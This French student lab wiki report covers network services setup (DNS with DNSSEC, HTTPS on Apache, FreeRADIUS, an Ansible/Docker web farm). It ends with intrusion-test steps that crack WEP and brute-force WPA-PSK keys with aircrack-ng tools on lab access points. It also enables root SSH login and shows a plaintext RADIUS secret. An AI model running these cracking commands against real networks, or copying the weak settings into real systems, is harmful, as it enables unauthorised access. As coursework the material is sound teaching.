 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier '''etc/ssh/sshd_config''' de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier '''/etc/bind/named.conf.options''' la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier '''/etc/bind/''' avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps: &lt;br /&gt;
 root@mycoplasma:/ apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut modifier les fichiers de configuration: &lt;br /&gt;
* clients.conf &lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0 # vi clients.conf &lt;br /&gt;
  client 10.60.200.2/24 {&lt;br /&gt;
   secret = secretIMA5SC&lt;br /&gt;
   shortname = borneMycoplasma&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
  client PA {&lt;br /&gt;
   ipaddr = 10.60.201.5&lt;br /&gt;
   secret = secretIMA5SC&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
* users &lt;br /&gt;
Il faut ajouter une ligne qui indique l'identifiant et le mot de passe. On a choisi les mêmes id que la VM : root et mot de passe habituel.&lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0# vim users&lt;br /&gt;
&lt;br /&gt;
 user Cleartext-Password := &amp;quot;&amp;lt;password&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Enregistrer les modifications et relancer :&lt;br /&gt;
 service freeradius stop&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible. Nous avons préparé le palybook suivant pour le déploiement de notre ferme de serveurs.&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# cat deploy-site.yaml''' &lt;br /&gt;
 ---&lt;br /&gt;
 - hosts: webservers&lt;br /&gt;
   tasks: &lt;br /&gt;
    - name: 1. Copying Website files&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/index.html&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/index.html&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 2. Copying Dockerfile&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/Dockerfile&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/Dockerfile&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 3. Install pip&lt;br /&gt;
      apt: name=python-pip state=present&lt;br /&gt;
    - name: 4. install docker package&lt;br /&gt;
      pip: name=docker&lt;br /&gt;
    - name: 5. Stop container if running&lt;br /&gt;
      docker_container:&lt;br /&gt;
       name: mycoplasmacontainer&lt;br /&gt;
       state: stopped&lt;br /&gt;
    - name: 6. delete image&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        force: yes&lt;br /&gt;
        state: absent&lt;br /&gt;
    - name: 7. Build Docker image from Dockerfile&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        path: &amp;quot;/tmp/docker/mycoplasma/&amp;quot;&lt;br /&gt;
        state: build&lt;br /&gt;
    - name: 8. Running the container&lt;br /&gt;
      docker_container:&lt;br /&gt;
        image: mycoplasma:latest&lt;br /&gt;
        state: started&lt;br /&gt;
        recreate: yes&lt;br /&gt;
        name: mycoplasmacontainer&lt;br /&gt;
        ports: &amp;quot;8002:80&amp;quot;&lt;br /&gt;
    - name: 9. Check if container is running&lt;br /&gt;
      shell: docker ps&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# ansible-playbook deploy-site.yaml'''&lt;br /&gt;
&lt;br /&gt;
[[Fichier:load_balancers.png]]&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
